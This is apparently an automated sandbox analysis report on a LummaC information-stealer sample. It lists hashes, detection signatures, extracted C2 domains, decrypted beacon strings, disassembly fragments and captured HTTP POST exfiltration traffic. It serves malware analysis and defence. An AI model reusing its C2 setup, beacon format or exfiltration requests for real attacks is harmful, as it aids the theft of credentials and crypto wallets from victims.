Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LwnI84BBtb.exe

Overview

General Information

Sample name:LwnI84BBtb.exe
renamed because original name is a hash value
Original sample name:49293c745f0fd48ab2784cad7cc5a0ac.exe
Analysis ID:1429106
MD5:49293c745f0fd48ab2784cad7cc5a0ac
SHA1:65c11bc045e69bec4e164914b2e2b3bfd2ef12a2
SHA256:25c3cd7375f5244402a5b407a107266c2c93dcaa6f313d78ad944689a2be184f
Tags:32exetrojan
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • LwnI84BBtb.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\LwnI84BBtb.exe" MD5: 49293C745F0FD48AB2784CAD7CC5A0AC)
    • WerFault.exe (PID: 7552 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 1568 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7624 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 1644 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "strollheavengwu.shop"], "Build id": "P6Mk0M--key"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1921423684.0000000001A4E000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1598:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      Process Memory Space: LwnI84BBtb.exe PID: 7396JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 0.3.LwnI84BBtb.exe.36a0000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "strollheavengwu.shop"], "Build id": "P6Mk0M--key"}
          Source: https://strollheavengwu.shop/apiVirustotal: Detection: 10%Perma Link
          Source: https://strollheavengwu.shop:443/apiVirustotal: Detection: 10%Perma Link
          Source: LwnI84BBtb.exeVirustotal: Detection: 40%Perma Link
          Source: LwnI84BBtb.exeJoe Sandbox ML: detected
          Source: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: demonstationfukewko.shop
          Source: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: liabilitynighstjsko.shop
          Source: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: alcojoldwograpciw.shop
          Source: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: incredibleextedwj.shop
          Source: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: shortsvelventysjo.shop
          Source: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: shatterbreathepsw.shop
          Source: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: tolerateilusidjukl.shop
          Source: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: productivelookewr.shop
          Source: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: strollheavengwu.shop
          Source: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
          Source: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
          Source: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
          Source: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
          Source: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
          Source: 00000000.00000002.1920730607.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: P6Mk0M--key
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_004162D6 CryptUnprotectData,0_2_004162D6

          Compliance

          barindex
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeUnpacked PE file: 0.2.LwnI84BBtb.exe.400000.0.unpack
          Source: LwnI84BBtb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
          Source: unknownHTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49735 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49737 version: TLS 1.2
          Source: Binary string: C:\cekimif35 yanofegec\62\pus.pdb source: LwnI84BBtb.exe
          Source: Binary string: [C:\cekimif35 yanofegec\62\pus.pdb source: LwnI84BBtb.exe
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\CEFJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esp+0Ch]0_2_0043B3B0
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov edi, dword ptr [esi+000000B8h]0_2_00410565
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then cmp word ptr [eax+edi+02h], 0000h0_2_004156B6
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then cmp word ptr [eax+edi+02h], 0000h0_2_004156B6
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], FD72A8C7h0_2_00438879
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0E17900Bh0_2_00437998
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0E17900Bh0_2_00437998
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov edx, dword ptr [esp+0Ch]0_2_00435B8B
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0041CC60
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h0_2_0041CC60
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]0_2_0043AE80
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then cmp word ptr [ebx+ecx+02h], 0000h0_2_0041AFE0
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0041AFE0
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]0_2_0043B060
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov eax, ebx0_2_00426097
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov eax, dword ptr [esi+1Ch]0_2_00426097
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_0040D160
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h0_2_0041210C
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov word ptr [eax], dx0_2_0041B1E0
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then jmp ecx0_2_0043A182
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then jmp ecx0_2_0043A190
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov byte ptr [edi], al0_2_004222E7
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov byte ptr [edi], al0_2_004222ED
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then jmp eax0_2_00439389
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then jmp eax0_2_00422422
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esi+40h]0_2_004134B2
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then movzx edi, bl0_2_0043A5D0
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esi+70h]0_2_004245D4
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov edi, dword ptr [esi+000000B8h]0_2_00410565
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esi+70h]0_2_00424678
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esi+70h]0_2_004245A8
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]0_2_0043B6A0
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then lea eax, dword ptr [eax+eax*4]0_2_004088F0
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esp+0Ch]0_2_0043B9D0
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then movzx ecx, byte ptr [edx+edi]0_2_0043B9D0
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, edi0_2_004069B4
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00417A65
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then jmp eax0_2_00417A1A
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then inc eax0_2_0041DB22
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov edi, dword ptr [esp]0_2_00407C70
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov esi, dword ptr [eax+ebx*4]0_2_00407C70
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]0_2_00437D40
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]0_2_0043AD70
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ebx, ecx0_2_00410D77
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov dword ptr [esi+000005F0h], 00000000h0_2_00410D77
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ebx, eax0_2_00402D10
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00412E93
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then inc eax0_2_00438F6A
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then inc ebx0_2_00414FC0
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00431F80
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h0_2_03662373
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then jmp ecx0_2_0368A3E9
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then jmp ecx0_2_0368A3F7
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_0365D3C7
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then cmp word ptr [ebx+ecx+02h], 0000h0_2_0366B247
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0366B247
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then inc ebx0_2_03665227
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov eax, ebx0_2_036762FE
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov eax, dword ptr [esi+1Ch]0_2_036762FE
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]0_2_0368B2C7
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_036821E7
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then inc eax0_2_036891D1
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]0_2_0368B0E7
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov word ptr [eax], cx0_2_036630FA
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esi+40h]0_2_03663719
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov edi, dword ptr [esi+000000B8h]0_2_036607CC
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esp+0Ch]0_2_0368B617
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then jmp eax0_2_03672689
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0367254E
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov byte ptr [edi], al0_2_03672554
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then jmp eax0_2_036895F0
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov word ptr [eax], dx0_2_0366B447
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then lea eax, dword ptr [eax+eax*4]0_2_03658B57
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0E17900Bh0_2_03687BFF
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0E17900Bh0_2_03687BFF
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then inc eax0_2_0366DA12
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], FD72A8C7h0_2_03688AE0
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esi+70h]0_2_0367480F
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]0_2_0368B907
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h0_2_0366B917
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then cmp word ptr [eax+edi+02h], 0000h0_2_0366591D
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then cmp word ptr [eax+edi+02h], 0000h0_2_0366591D
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esi+70h]0_2_0367483B
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then movzx edi, bl0_2_0368A837
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esi+70h]0_2_036748DF
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ebx, eax0_2_03652F77
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ebx, ecx0_2_03660FDE
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov dword ptr [esi+000005F0h], 00000000h0_2_03660FDE
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]0_2_0368AFD7
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]0_2_03687FA7
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0366CEC7
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h0_2_0366CEC7
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov edi, dword ptr [esp]0_2_03657ED7
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov esi, dword ptr [eax+ebx*4]0_2_03657ED7
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov edx, dword ptr [esp+0Ch]0_2_03685DF2
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov ecx, dword ptr [esp+0Ch]0_2_0368BC37
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then movzx ecx, byte ptr [edx+edi]0_2_0368BC37
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then mov word ptr [eax], cx0_2_03667CCC
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 4x nop then jmp eax0_2_03667C81

          Networking

          barindex
          Source: Malware configuration extractorURLs: demonstationfukewko.shop
          Source: Malware configuration extractorURLs: liabilitynighstjsko.shop
          Source: Malware configuration extractorURLs: alcojoldwograpciw.shop
          Source: Malware configuration extractorURLs: incredibleextedwj.shop
          Source: Malware configuration extractorURLs: shortsvelventysjo.shop
          Source: Malware configuration extractorURLs: shatterbreathepsw.shop
          Source: Malware configuration extractorURLs: tolerateilusidjukl.shop
          Source: Malware configuration extractorURLs: productivelookewr.shop
          Source: Malware configuration extractorURLs: strollheavengwu.shop
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: strollheavengwu.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: strollheavengwu.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18161Host: strollheavengwu.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8782Host: strollheavengwu.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20435Host: strollheavengwu.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 3792Host: strollheavengwu.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1391Host: strollheavengwu.shop
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 554814Host: strollheavengwu.shop
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownDNS traffic detected: queries for: strollheavengwu.shop
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: strollheavengwu.shop
          Source: LwnI84BBtb.exe, 00000000.00000003.1702692182.0000000004215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: LwnI84BBtb.exe, 00000000.00000003.1702692182.0000000004215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: LwnI84BBtb.exe, 00000000.00000003.1702692182.0000000004215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: LwnI84BBtb.exe, 00000000.00000003.1702692182.0000000004215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: LwnI84BBtb.exe, 00000000.00000003.1702692182.0000000004215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: LwnI84BBtb.exe, 00000000.00000003.1702692182.0000000004215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: LwnI84BBtb.exe, 00000000.00000003.1702692182.0000000004215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: LwnI84BBtb.exe, 00000000.00000003.1702692182.0000000004215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: LwnI84BBtb.exe, 00000000.00000003.1702692182.0000000004215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
          Source: LwnI84BBtb.exe, 00000000.00000003.1702692182.0000000004215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: LwnI84BBtb.exe, 00000000.00000003.1702692182.0000000004215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: LwnI84BBtb.exe, 00000000.00000003.1685507851.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685440661.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685351336.000000000422F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: LwnI84BBtb.exe, 00000000.00000003.1712472614.0000000004201000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1712668500.0000000004205000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
          Source: LwnI84BBtb.exe, 00000000.00000003.1685507851.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685440661.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685351336.000000000422F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: LwnI84BBtb.exe, 00000000.00000003.1685507851.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685440661.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685351336.000000000422F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: LwnI84BBtb.exe, 00000000.00000003.1685507851.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685440661.000000000421A000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1685351336.000000000422F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
